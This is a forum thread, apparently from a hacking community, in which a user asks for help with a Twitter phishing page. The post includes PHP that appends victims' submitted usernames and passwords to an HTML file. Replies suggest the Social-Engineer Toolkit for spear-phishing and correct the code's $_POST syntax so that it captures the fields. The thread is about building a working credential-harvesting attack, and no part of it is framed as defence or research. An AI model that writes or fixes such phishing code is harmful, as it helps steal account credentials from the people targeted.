Twitter username and paswords variables handling

[Galtor]

Hi all,

I'm trying to get a pof of a Twitter phishing, but I'm getting problems with the PHP file that writes victim's inputs into another file. The PHP code I started programming was this:

$fp = fopen("TwitterPasswords.htm", "a");
fwrite($fp, "Email:$_POST[username_or_email]\tPassword:$_POST[password]");
echo "<HTML>

and according to Twitter source page, variables are name="session[username_or_email]"  and name="session[password]". I'm quite newbie, how can I handle those variables, please?

Thanks a lot,

[iTpHo3NiX]

Those are long, I don't think you can handle it

[Galtor]

if so, is there any way to catch those variables? I think that there are those phishing web pages based on old versions of Twitter.

Thanks

[iTpHo3NiX]

Use SET, spear-phishing. Make sure you chmod you text file to store the accounts. But anyways that went WAY over your head

[ande]

Are that code supposed to work? $_POST[username_or_email] and $_POST[password] are not valid syntax. I think you will have to do $_POST['username_or_email'] and $_POST['password'] in this case.

PS: I think you should post a bit more information about the environment you are working on. Twitter source page? session? What does your POST form look like? Where does it come from and how is it sent? And so on.